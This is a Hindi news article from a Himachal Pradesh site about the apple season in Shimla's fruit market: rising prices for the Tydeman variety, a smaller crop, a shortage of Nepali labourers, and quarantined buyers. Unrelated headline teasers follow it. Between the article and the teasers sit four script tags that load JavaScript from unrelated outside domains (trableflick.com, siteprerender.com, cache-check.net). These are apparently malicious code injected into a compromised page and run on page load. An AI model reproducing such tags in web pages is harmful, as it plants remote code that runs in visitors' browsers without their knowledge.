<p>प्रदेश की आर्थिकी में 45 हज़ार करोड़ से ज़्यादा की भागीदारी निभाने वाला सेब शिमला की फ़ल मंडी में पहुंचने लगा है। निचले क्षेत्रों से सेब की फसल मंडियों तक पहुंचने लगी है। अभी टाइडमैनन सेब की किस्म शिमला मंडी में पहुंच रही है। शुरुआती दौर के बागवानों को सेब के अच्छे दाम मिल रहे है। 25 किलो की टाइडमैनन सेब के एक पेटी आजकल 1500 से लेकर 1900 तक बिक रही है। जो पिछले साल के मुक़ाबले 500 रुपये तक ज़्यादा आंकी जा रही है।</p>
<p>बागवानों की माने तो इस मर्तबा सेब की फसल लगभग 50 फ़ीसदी तक कम रहने की उम्मीद है इसलिए दाम शायद न गिरें। अब विदेशों से आने वाला सेब भी महंगा आएगा साथ ही चीन का सेब नही आता है तो मार्किट में सेब के अच्छे दाम मिलने की आस है। लेकिन नेपाली मज़दूरों की कमी सेब को मंडियों तक पहुंचाने में मुश्किलें खड़ी कर रही है। क्योंकि 50 फ़ीसदी नेपाली मज़दूर इस बार नहीं पहुंचे हैं। बागवानों का कहना है कि जितना काम नेपाली मज़दूर करता है उस स्तर का काम दूसरा मज़दूर नही कर पाता है।</p>
<p>उधर इस बार बाहरी राज्यों से अभी सेब के खरीददार भी कम पहुंचे है जो पहुंचे भी है वह 14 दिन के क्वारंटाइन पर चल रहे हैं। आढ़तियों यानी सेब के खरीददार भी लेबर की समस्या से जूझ रहे है। इनका कहना है कि हालांकि लॉकडाउन के चलते मार्किट गिरी है बाबजुद इसके सेब के दाम बागवानों को अच्छे मिल रहे है। हिमाचली सेब के दाम आगे भी अच्छे रहने की उम्मीद है जिससे बागवानों सहित आढ़तियों को भी फ़ायदा मिलेगा।</p>
<p> </p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1593947988871″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
NPS employees Himachal DA update: हिमाचल प्रदेश सरकार ने राष्ट्रीय पेंशन प्रणाली (एनपीएस) के तहत…
Festive financial boost for Himachal: वित्तीय संकट से जूझ रहे हिमाचल प्रदेश को केंद्र सरकार…
Yamuna Sharad Festival 2024: नगर निगम पांवटा साहिब द्वारा आयोजित ‘यमुना शरद महोत्सव’ इस वर्ष…
Masked Attacker Injured Schoolgirl: कांगड़ा के रक्कड़ में एक दसवीं कक्षा की छात्रा पर अज्ञात…
District Athletics Meet: गुरुवार दोपहर को हमीरपुर के सिंथेटिक ट्रैक पर जिला स्तरीय एथलेटिक्स मीट…
Prostration Journey to Mata Bala Sundari: हरियाणा के करनाल से श्रद्धालुओं का एक जत्था…